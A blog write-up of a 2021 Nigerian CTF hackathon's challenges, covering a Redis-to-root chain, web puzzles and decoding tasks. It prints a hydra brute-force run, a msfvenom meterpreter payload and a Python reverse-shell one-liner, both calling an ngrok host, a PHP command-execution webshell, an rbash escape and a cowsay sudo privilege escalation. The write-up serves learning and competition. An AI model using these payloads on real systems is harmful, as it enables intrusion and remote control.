Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Overview Of The CTF

As part of the 2021 Cybersecurity Conference, the American Business Council Nigeria (ABC Nigeria) was Organized by NaijaSecForce in partnership with Private Sector partners are hosting a Cybersecurity Hackathon. The objective of the hackathon is to highlight the capacity in the space and show the importance of implementing a cybersecurity framework in Nigeria.

The Hackathon will award innovators for displaying their level of expertise and skills in developing solutions to cyber challenges. A Cyber Award will be allocated in kind and will be distributed among the top three winners.

Cyber Awards will be awarded to the top three teams. Prices includes Laptops, Cybersecurity Certificates, Bootcamp for winners on Security in IBM Cloud, Cisco Certified CyberOps Associate Certifications for the Team Captains and Merchandise. The Award is sponsored by Cisco, IBM, Comercio and American Business Council.

Cybersecurity Hackathon Competition Finals Write Up By RedTeamNG

Damn man am so excited when working on the write up like man all the challenges are pretty cool come on Muzec just get started already lol.

WYSIWYG - 700 Point

image

Man I Keep Saying It We Always Start With An Nmap Scan.

muz3c@RedTeamNG:/$ nmap -sC -Pn -sV -p- 193.37.212.211 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2021-08-26 05:51 EDT
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.69% done; ETC: 05:54 (0:01:41 remaining)
Nmap scan report for 193.37.212.211
Host is up (0.20s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
6379/tcp open  redis   Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.35 seconds

So we have some interesting ports 22 which is SSH and 6379 ahhh the mighty Redis port but no HTTP or HTTPS i mean port 80 or 443 man don’t google that up again lol just kidding man. I think we all know port ssh but before diving deep let look into the redis port.

What IS Redis

Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability. Redis supports different kinds of abstract data structures, such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indices. which is always on port 6379 which can always change also probably for security reason man let just hack it feel free to check redis Documentation.

Redis Manual Enumeration

 redis-cli -h  193.37.212.211

image

Seems anonymous logins is not allowed let try brute forcing with hydra.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ hydra -P /usr/share/wordlists/rockyou.txt  193.37.212.211  redis         
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-26 08:05:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking redis://193.37.212.211:6379/
[6379][redis] host: 193.37.212.211   password: hotdog
[STATUS] 2964.00 tries/min, 2964 tries in 00:01h, 14341435 to do in 80:39h, 16 active

Ahhh nice we have the password now let log in redis again with the new credentials.

image

We are in typing info give us some more information about the databases and bla bla bla now let dump something using redis-dump .

redis-dump -u  193.37.212.211  -a hotdog > full.json

image

Avoid the wget bla bla bla i don’t know what the dude is trying to wget again in redis now we have the credentials let just crack the hash.

image

we have credentials for SSH now.

lowprivuser
passw0rd123

But let go back to the redis and try and read the databases manually.

image

SELECT 0
KEYS *
GET "lowprivuser"

image

Now back using SSH.

image

We are in let check the shell we have echo $SHELL .

image

Ahhh rbash restricted lol rudefish i will get you lol.

image

sudo -l but nothing let check how many users we have on the linux system first.

image

More users cool let go to the home directory but seems we are still restricted let break out of it.

image

Breaking Out With VI

vi
:set shell=/bin/sh
:shell 

image

image

We have no access to abcctf folder now let find way to move our privilege

image

We have port 80 running locally and mysql port also dns port now let port forward using SSH.

ssh -L 8080:localhost:80 lowprivuser@193.37.212.211

image

Accessing localhost:8080

image

But i have no idea why am having problem using the SSH port fowarding let transfer it man i hate using Metasploit.

Generating Payload With Msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=10969 -f elf > shell.elf

NOTE:- i will be using ngrok to recieve back connection actually it pretty cool you should try it.

image

Seems we have generate our payload and our listener is ready on msfconsole.

image

NOTE:- you need to transfer your payload to the target also to execute it.

image

Checking Our listener and boom a Meterpreter session 1 opened.

image

portfwd add -l 80 -p 80 -r 127.0.0.1

Port Forwarding i know you know.

image

Now accessing the webserver on our localhost.

image

Now let try and create account.

image

We are in.

image

Simple Image Gallery System 1.0 a quick google search and we know it vulnerable to SQL injection and RCE but seems we register a user let hit the RCE.

image

So i decided to upload a php command injection code on the profile picture page.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat shell.php     
<?php system ($_GET['cmd']) ?>

image

Boom we have command injection now let get a reverse shell.

image

Checking our Ncat listener back.

image

Now let spawn a tty shell.

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Now let enumerate more on the target using linpeas.sh .

image

/var/www/html/gallery/initialize.php:if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"forthedubs");                                                                   
/var/www/html/gallery/initialize.php:if(!defined('DB_USERNAME')) define('DB_USERNAME',"www-data");                                                                     

Ahhh we have some credential for the database let try it on mysql.

image

We are in.

image

mysql> SELECT * from users;
SELECT * from users;
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------
--+---------------------+
| id | firstname    | lastname | username | password                         | avatar                                          | last_login | type | date_added        
  | date_updated        |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------
--+---------------------+
|  1 | Adminstrator | Admin    | admin    | 0192023a7bbd73250516f069df18b500 | uploads/1629675420_TagorbnpwmgzgrsorojLetta.php | NULL       |    1 | 2021-01-20 14:02:3
7 | 2021-08-22 23:37:40 |
|  2 | Jane         | Doe      | abcctf   | zburhWD2B7PqTx6sVfVszBE3KhgCqT   | uploads/1624240500_avatar.png                   | NULL       |    1 | 2021-01-20 14:02:3
7 | 2021-06-21 09:55:07 |
| 10 | rat          | rat      | rat      | d285ed4b87f365a2273842b0208a60c8 | NULL                                            | NULL       |    0 | 2021-08-23 20:56:2
0 | NULL                |
| 11 | bots         | bots     | bots     | 2241bbfb8e26f6de627e38a1bbcdc9a9 | uploads/1629752160_webshell.php                 | NULL       |    0 | 2021-08-23 20:56:3
3 | NULL                |
| 12 | ratty        | rattyu   | ratty    | d285ed4b87f365a2273842b0208a60c8 | uploads/1629752220_Capture.PNG                  | NULL       |    0 | 2021-08-23 20:57:4
7 | NULL                |
| 13 | bots         | bots     | bots     | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php                 | NULL       |    0 | 2021-08-23 20:58:1
8 | NULL                |
| 14 | bots         | bots     | bots     | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php                 | NULL       |    0 | 2021-08-23 20:58:2
5 | NULL                |
| 15 | ratty        | ratty    | ratty    | 289462fcc025ce66f113ac73a13131cf | uploads/1629752400_God.png                      | NULL       |    0 | 2021-08-23 21:00:5
8 | NULL                |
| 16 |              |          | ratty    | d285ed4b87f365a2273842b0208a60c8 | NULL                                            | NULL       |    0 | 2021-08-23 21:06:0
7 | NULL                |
| 17 | Musa         | saminu   | muzec    | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629994260_shell.php                    | NULL       |    0 | 2021-08-26 14:13:3
9 | 2021-08-26 16:11:48 |
| 18 | Musa         | Saminu   | muzec    | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629987780_muzec.png                    | NULL       |    0 | 2021-08-26 14:23:1
0 | NULL                |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------

I was able to dump some users credentials but the one that i found interesting is;

|  2 | Jane         | Doe      | abcctf   | zburhWD2B7PqTx6sVfVszBE3KhgCqT   | uploads/1624240500_avatar.png                   | NULL       |    1 | 2021-01-20 14:02:3 

We have abcctf running on the system also let try it using su abcctf with the password .

image

We are in hahhahahaha and also we can run sudo.

image

We have the first part of the flag now let root it.

ROOT

image

abcctf@vps:~$ sudo -l
Matching Defaults entries for abcctf on vps:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User abcctf may run the following commands on vps:
    (root) /usr/games/cowsay
abcctf@vps:~$ TF=$(mktemp)
abcctf@vps:~$ echo 'exec "/bin/sh";' >$TF
abcctf@vps:~$ sudo /usr/games/cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
final_part.txt  snap
# cat final_part.txt
Congratulations, you made it to the end. Herer is the remaining part of your flag.

0r_4re_clos3r_than_they_app34r}
# echo "Muzec is Here" > .root.txt
# 

We are done fun right?? hahahahaha

Final Flag:- abcctf{0bjects_!n_the_Mirr0r_4re_clos3r_than_they_app34r}

Mr Obiora, the BEC victim - 500 point

image

Mr. Obiora Nurudeen - despite having attended multiple security awareness sessions - still loves to open unknown attachments regardless of the format. Try to get Mr. Obiora to run your malicious payload so you can access his PC. His email is obiora_nurudeen@ctf.ng.

What is his IP address?

Man it was way cool i actually solve it the unintended way cool right i know i love breaking things unintended way since we have the mail why not try sending a mail maybe will get a reply back.

SPAMMING
Muzec Saminu <redacted@gmail.com>
	
Aug 24, 2021, 4:34 AM (3 days ago)
	
to obiora_nurudeen
checking

I waited an hour before getting back a reply which is job well done lol.

image

Now let try getting the IP address.

image

Show original

image

Going through it and i was able to get Mr. Obiora IP address 185.177.59.120

Final Flag:- abcctf{185.177.59.120}

Easy Peasy - 100 point

image

Easy peasy to simple just like the name stated we have the URL to attack already let hit it.

image

A simple login page also a button to register which seems to be not working hahahaha let try some default credentials on the login page like admin/admin not luck admin/password but man i got nothing let try checking the source code.

image

Got nothing also let try to burst some directory with gobuster.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://185.203.119.50:4200/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,pl,cgi,zip,txt,php,html,bak
[+] Timeout:                 10s
===============================================================
2021/08/27 14:05:07 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5277]
/dev                  (Status: 301) [Size: 321] [--> http://185.203.119.50:4200/dev/]

Some interesting develompent page let check it out.

image

Let hit the source code again.

image

Cool a hint let trying going down more.

image

Another hint i think let try decoding it using terminal.

image

We are down to <!-- var _0x26a3=["\x4A\x61\x56\x61\x53\x63\x52\x69\x50\x74\x5F\x69\x53\x5F\x66\x55\x6E"];console.PassCode(_0x26a3[0]) -->

Seems like hex to me let try using cyberchef.

image

JaVaScRiPt_iS_fUn

A flag nah i try it but no luck maybe it a password let dig more.

By the way, we have created a nice login page in PHP. Go find it out

Seems we know we are in the development page let burst the endpoint.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/dev -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://185.203.119.50:4200/dev
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,sh,pl,cgi,zip,txt,php,html
[+] Timeout:                 10s
===============================================================
2021/08/27 14:14:02 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 526]
/login.php            (Status: 200) [Size: 1654]

Boom i feel like a l33t hacker now lol we have the login page let try the password on it.

image

Password:- JaVaScRiPt_iS_fUn not to sure but let try it.

image

Ahhh it password but seems we need to try harder to get the flag lol let check the source page again.

image

But it a dead end maybe the image can help let wget it to our machine.

image

We have it now let check some metadata bla bla bla using exiftool .

image

Boom we got the flag page /ThE_FlAg_PaGe.html let hit it.

image

You made it champ, Here is your reward, the flag! and we got the flag.

Final Flag:- abcctf{H4cKiNG_i$_FuN_K33P_L34RN1NG}

Secret Keepers - The Beginning - 150 point

image

Let go of the burden, tell us your secrets we have the URL to pwned pwned sorry i mean attack let hit it.

image

Nice let look around we have some page let check the contact us page.

image

Sweet a flag page let check it out maybe it way simple lol.

image

We have a half flag damn Your flag is abcctf{l3t_ not that simple i guess back to the contact form.

image

A little hint;-

Ermm, send to rudefish, he might have something for you

We should have a cooke present let check it with cookie editor.

image

Nice sending to web-admin let intercept the request with burp and edit the cookie to rudefish .

image

Edit request below like the image.

image

Cookie: sendTo=rudefish

Now send let check our mail we should receive a mail from rudefish if it right.

image

Boom we have the complete flag now.

Final Flag:- abcctf{l3t_h4v3_your_secr375!}

Secret Keepers - Intermediate - 150 point

image

Now back to the rudefish mail.

One of my challenges is differentiating robots from humans. But since you are here, a human, I will let you in on a little secret.

                              User-Agent: *
                              Disallow: /115 101 99 114 101 116 45 99 111 110 116 114 111 108 45 99 101 110 116 101 114
                          

Does that make sense? I hope so. See you at the other side.

Looking like deciaml code.

image

Nice am right we have a secret page cool secret-control-center let access it.

image

Admin Control Center cool we have the mail already rudefish@secretkeepers.abc but we are missing a password hahahaha nice brute forcing i guess let try creating a wordlist with cewl with the url.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cewl http://185.203.119.50:6500/home > abc.txt
  

But man it was generating rubbish so let try to extract the words solo.

image

Never
seek
to
tell
thy
love
Love
that
never
told
can
be
For
the
gentle
wind
does
move
Silently
invisibly
I
told
my
love
I
told
mylove
I
told
her
all
my
heart
Trembling
cold
in
ghastly
fears
Ah
she
doth
depart
Soon
as
she
was
gone
from
me
A
traveller
whistleblower
came
by
Silently
invisibly
O
was
no
deny
https
com
www
creative
tim
paper
kit
notice
and
Paper
Kit
Angular
Product
Page
product
angular
Copyright
Creative
Tim
Licensed
under
MIT
github
timcreative
blob
master
LICENSE
The
above
copyright
this
permission
shall
included
all
copies
substantial
portions
the
Software
Secret
Keepers
Fonts
icons

Save in a txt file now let intercept the login form and brute force the hell out of it.

image

Intercept with Burp.

image

Send to Intruder.

image

Now click on clear we only the password form to bruteforce.

image

Now let add it.

image

Now let click on the payloads.

image

Click on payloads options and load the wordlist after that let click on start attack.

image

When we have the right password the status and the length would be different.

image

We are in the password is whistleblower now let log in.

image

We are in man we are in awesome right let get the flag.

image

Final Flag:- abcctf{g00d_t0_se3_you_here_hum4n}

Secret Keepers - The End - 100 point

image

Seems we can execute some command let get a reverse shell.

image

Now let get a reverse shell using ngrok.

image

Ncat listener ready.

image

Reverse shell payload ready.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("2.tcp.ngrok.io",19733));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

Checking our Ncat listener and we have shell.

image

Now hunting for the last flag i check the root folder i got nothing.

image

But seems we have a hidden git folder running let check it out.

image

Going through some commit and we have some leads and we have the last flag hahahaaha fun right??

image

Final Flag:- abcctf{remember_YoUr_s3cret_!s_safe_with_us}

All clear man i have fun let hit it.

Pinky and The mouse - 100 point

image

Let download the head.txt file.

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>---.+.+..+++++++++++++++++.--------------.+++++++++++++++++++++.<+++++++++++++.>------------------.++++.+++.----.<++++++.++++++.-----------------------------.>++++++.<--.>---------.+++++.---------------------.++++++++++++++++++++++++++++++++++++.

Definitely a Brainf*ck Code let hit it.

image

Final Flag:- abcctf{SimplY_Br@inY}

Gentle Reminder - 250 point

image

Never put sensitive things in your purse man let just download it.

011^0000^1011^011^00^0100^0100^1011^111^001^1000^0^0100^111^111^101^00^10^110^0010^111^010^011^0000^01^1^00^000^10^111^1^11^00^000^000^00^10^110^0^11^111^000^00011^011^01^1011^0100^0110^11^00^000^0^000^010^11111^11^0010^1^1010^1010^1000^01^01^11^111^10^110^11^00^000^000^00^10^110^1^0000^00^10^110^000^111^010^100^111^1011^111^001^10^111^1^101^10^111^011^1^0000^01^1^00^1^011^00^0100^0100^0100^0^01^100^1^111^1011^111^001^0100^111^111^101^00^10^110^1^111^111^100^0^0^0110^0100^1011^01^10^100^011^00^100^0^0100^1011^0010^111^010^011^0000^01^1^000^0000^111^001^0100^100^10^111^1^1000^0^000^111^001^110^0000^1^0010^111^010^00^10^1^0000^0^0100^01^10^100^111^0010^1^0000^0^110^01^11^0

I will call it a fu#king broken binary when not let fix it.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat  binary.txt  | tr  '^'  ' '
011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0

Cutting out ^ and also adding some space.


from __future__ import print_function
a = input("input the string:")
s = a.split(" ")
dict = {'01': 'A',
        '1000': 'B',
        '1010': 'C',
        '100':'D',
        '0':'E',
        '0010':'F',
        '110': 'G',
        '0000': 'H',
        '00': 'I',
        '0111':'J',
        '101': 'K',
        '0100': 'L',
        '11': 'M',
        '10': 'N',
        '111': 'O',
        '0110': 'P',
        '1101': 'Q',
        '010': 'R',
        '000': 'S',
        '1': 'T',
        '001': 'U',
        '0001': 'V',
        '011': 'W',
        '1001': 'X',
        '1011': 'Y',
        '1100': 'Z',
        '01111': '1',
        '00111': '2',
        '00011': '3',
        '00001': '4',
        '00000': '5',
        '10000': '6',
        '11000': '7',
        '11100': '8',
        '11110': '9',
        '11111': '0',
        '001100': '?',
        '10010': '/',
        '101101': '()',
        '100001': '-',
        '010101': '.',
        '110011':',',
        '011010':'@',
        '111000':':',
        '101010':':',
        '10001':'=',
        '011110':"'",
        '101011':'!',
        '001101':'_',
        '010010':'"',
        '10110':'(',
        '1111011':'{',
        '1111101':'}'
        };
for item in s:
    print (dict[item],end='')

Some really cool script to decode it.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ python3 crypto.py                                                                                      
input the string:011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0
WHYWILLYOUBELOOKINGFORWHATISNOTMISSINGEMOS3WAYLPMISESR0MFTCCBAAMONGMISSINGTHINGSORDOYOUNOTKNOWTHATITWILLLEADTOYOULOOKINGTOODEEPLYANDWIDELYFORWHATSHOULDNOTBESOUGHTFORINTHELANDOFTHEGAME 

In clear format;

WHY WILL YOU BE LOOKING FOR WHAT IS NOT MISSING EMOS3WAYLPMISESR0MFTCCBA AMONG MISSING THINGS OR DO YOU NOT KNOW THAT IT WILL LEAD TO YOU LOOKING TOO DEEPLY AND WIDELY FOR WHAT SHOULD NOT BE SOUGHT FOR IN THE LAND OF THE GAME

A words is in reverse let fix that.

image

We have the flag since we know the format it should be easy.

Final Flag:- abcctf{m0rse_simply_aw3some}

No-brainer - 350 point

image

I wonder if they use their brains at all, or something else, man you talk to much let just hit it.

image

JsFuck it should be easy.

image

Decoding and we got return"aler\164\50a\142\143\143\164f\173\102r\100in\137\167\110\101\164s\137u\120\175\51" Definitely a javascript strings.

image

Final Flag:- abcctf{Br@in_wHAts_uP}

Read read Read - 500 point

image

Learning by books make sense

A docx file was given for this challenge, Given the word hint biblio (book) as the file name and the challenge title “read read read”, had me thinking it might have been a book cipher.

My first attempt was to actually view the document as is, in it’s .docx format. It turned out to be a one page document with multiple paragraphs whose content was basic, nothing special.

image

So if this was truely a book cipher as suspected, i knew i needed some sort of key(s) to crack it. A quick note is that docx files are actually zip archives with a bunch of XMLs and all the attached media. I decided to pass it straight into cyberchef for unzipping and further analysis.

image

With the help of cyberchef unzip tool, i was able to bake (extract) to reveal the underlying files which were xmls and rels files. Clicking through each file accordingly, i came across an interesting xml, “words/rel/rels.xml”. Interesting because it had a PNG signature.

image

I downloaded this file out of cyberchef’s results then converted and opened it to reveal a 15 rows and 3 column digits as shown below;

image

6 1 13
1 2 22
5 1 60
3 1 4 
4 3 10
1 2 2
8 4 2 
5 2 1
6 2 16
2 3 24
2 2 5
6 2 16
1 2 23
1 3 1
1 2 30

Alas! The keys!!

Next was to find out how this 3 parts keys fit into the book cipher as most book cipher consist majorly of 2 parts. But the major key here was making sure to have the word document opened in its original layout using office word ( software or online version) and not a text wrapping docx viewer in other to not mess up with the document line layout.

Since the docx had only 1 page, the first part of the key couldn’t be page number so i decided to take it as paragraph number as there are only 8 paragraphs in the text and the highest key digit in the first column was 8 which made it fit perfectly.

For the second key part, it had to translate to line number to give us the perfect position to apply the third key.

The Final key was a bit confusing as it could either mean words count to choose first letter or letter count. I decided after seeing the greatest value of 60 that no paragraph had up to 60 words on them and then opted for the second option of letter count starting from the line number gotten from the second key part to reveal;

image

6 1 13 --- c
1 2 22 --- 1
5 1 60 --- P
3 1 4 --- h 
4 3 10 --- 3
1 2 2 --- r
8 4 2 --- f
5 2 1 ---R
6 2 16 ---0
2 3 24 ---m
2 2 5 --- b
6 2 16 --- 0 
1 2 23 --- 0
1 3 1 --- k
1 2 30 ---5

Since we know the flag format it shoukd be easy.

Final Flag:- abcctf{c1Ph3r_fr0m_b00k5}

The Read read Read Crypto challenge was only solve by our redqueen AN3M0N1 feel free to connect with her on twitter with Kaka Sheidu or on Linkedln Kaka Sheidu .